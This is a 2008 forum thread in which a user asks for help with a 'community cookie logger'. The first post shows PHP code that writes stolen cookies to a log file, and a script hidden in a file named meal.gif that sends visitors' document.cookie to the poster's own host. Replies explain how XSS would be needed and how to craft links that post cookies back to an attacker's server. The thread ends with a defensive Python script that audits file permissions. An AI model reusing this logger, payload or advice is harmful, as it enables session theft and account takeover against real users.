Masquerade Posted December 5, 2008

Hey everyone. I'm trying to set up a community cookie logger. I've created a cookielogger.php containing

    $filename = "logfile.txt";
    if (isset($_GET["cookie"])) {
        if (!$handle = fopen($filename, 'a')) {
            echo "Temporary Server Error,Sorry for the inconvenience.";
            exit;
        } else {
            if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) {
                echo "Temporary Server Error,Sorry for the inconvenience.";
                exit;
            }
        }
        echo "Temporary Server Error,Sorry for the inconvenience.";
        fclose($handle);
        exit;
    }
    echo "Temporary Server Error,Sorry for the inconvenience.";
    exit;
    ?>

Then, an empty logfile.txt

And a file called meal.gif containing

    <script>location.href='http://masque.myhost.net/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>

The files look like the following:

    /htdocs/cookielogger.php
    /htdocs/logfile.txt
    /htdocs/meal.gif

Read and Write permissions on logfile.txt are enabled (7777). But somehow, the file is still empty after a visit from a community member. Could someone help me with that? Thanks!

Benny

digip Posted December 6, 2008

Unless you can find a cross site scripting flaw in the site you're trying to steal cookies from, or in the user's browser itself, you are not going to be able to download all their cookies by simply having them view your site. The only cookie you would be able to get this way is one set by your own site.

Now, if you could insert some code that ran on someone else's site and wrote the cookies back to your servers, then you might have the chance to steal something, but only if they fall victim to xss vulnerabilities. Iframes won't work either, since the iframe would be cookies from your site, not the target site. Javascript is your best bet, or if you could post back to your php file on your site with a form or javascript link embedded on their site.

Ingo Posted December 6, 2008

Other than what Digip pointed out, you have a typo:

    { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) {

At least I think that there should not be three (3) "=" marks, two (2) should mean equal. And shouldn't you specify the name of the cookie you are trying to get? Sorry if my post is complete bs.

digip Posted December 6, 2008

> Other than what Digip pointed out, you have a typo: At least I think that there should not be three (3) "=" marks, two (2) should mean equal. And shouldn't you specify the name of the cookie you are trying to get? Sorry if my post is complete bs.

You can get the cookie with javascript simply by typing into your toolbar the following:

    java script:alert(document.cookie);

Just take out the spaces the forums put in the code. If you were stealing cookies, you can use something similar to construct a URL people can click on and make it post back the cookie to some cgi or php script on your own server. If they were dumb enough, you could make an email url and have them send it to you directly. It's whether or not the target site you want the cookies from is vulnerable to xss though, and if they allow you to post javascript or other code into their pages.

aeturnus Posted December 9, 2008

> Read and Write permissions on logfile.txt are enabled (7777).

You set a file facing the Internet to 7777 with that code you provided? That's awesome, can I go ahead and get your IP address? Thanks :)

PLuNK Posted December 9, 2008

The file permissions should be 0777 not 7777.

And you're not going to really be able to modify the files being presented on the HTTPd, unless you find an exploit.

aeturnus Posted December 9, 2008

> The file permissions should be 0777 not 7777.
> And you're not going to really be able to modify the files being presented on the HTTPd, unless you find an exploit.

I hope you weren't responding to me since your post is completely incorrect.

PLuNK Posted December 9, 2008

Yes, I was responding to you. Please explain?

aeturnus Posted December 9, 2008

> The file permissions should be 0777 not 7777.
> And you're not going to really be able to modify the files being presented on the HTTPd, unless you find an exploit.

Well, there's a lot wrong here. Without going into too many details or wanting to argue, let's just take your statements and debunk them. Given the code:

> I've created a cookielogger.php containing
>
>     $filename = "logfile.txt";
>     if (isset($_GET["cookie"])) {
>         if (!$handle = fopen($filename, 'a')) { ... }
>         else { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) { ... } }
>         ...
>     ?>

You simply give him a page with a correct cookie value and it's written to the file. That file is served by httpd. So "And you're not going to really be able to modify the files being presented on the HTTPd" is an incorrect statement.

Let's look at your first statement about the file permissions. Why do you need the setuid, sticky, setgid, and execute permissions set? It's a security risk. So that statement is wrong as well.

Yes, I think I see what you meant to say about the exploitation. But you didn't, and your statements are therefore incorrect like I said. The details about how I would gain entry to such a system are beyond the scope of this argument. If you ask me really nicely I might try to help you out if you set up such a box for me to gain entry to.

Really though, if you can't see any problems with the presented vulnerabilities then you should pick up a book on security. Start simple, go with the Hacking Exposed books.

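The 7777 versus 0777 disagreement above, as an added example that is not part of the original thread: a Python audit that decodes which risky bits an octal mode carries and walks a web root flagging files that have them. The function names and the temporary sample tree are constructed for illustration.

```python
import os
import stat
import tempfile

# Mode bits a defender cares about on files served from a web root.
RISKY_BITS = [
    (stat.S_ISUID, "setuid"),
    (stat.S_ISGID, "setgid"),
    (stat.S_ISVTX, "sticky"),
    (stat.S_IWOTH, "world-writable"),
    (stat.S_IXOTH, "world-executable"),
]


def describe_mode(mode):
    """Return the risky flag names set in a numeric mode such as 0o7777."""
    return [name for bit, name in RISKY_BITS if mode & bit]


def audit_tree(root):
    """Return {relative_path: [flags]} for regular files with any risky bit."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: do not follow symlinks out of root
            if not stat.S_ISREG(st.st_mode):
                continue
            flags = describe_mode(stat.S_IMODE(st.st_mode))
            if flags:
                findings[os.path.relpath(path, root)] = flags
    return findings


def build_sample_tree():
    """Constructed sample: one log file at 0777 and one at 0640."""
    root = tempfile.mkdtemp(prefix="htdocs_sample_")
    for name, mode in (("logfile.txt", 0o777), ("app.log", 0o640)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("")
        os.chmod(path, mode)  # chmod is not affected by the umask
    return root


if __name__ == "__main__":
    print("7777 ->", describe_mode(0o7777))
    print("0777 ->", describe_mode(0o777))
    for path, flags in audit_tree(build_sample_tree()).items():
        print(path, flags)
```

Both modes discussed in the thread are flagged: 0777 still leaves the file writable and executable by every local user. A log written by the web server needs only owner read/write (for example 0600 or 0640) and is better kept outside the document root.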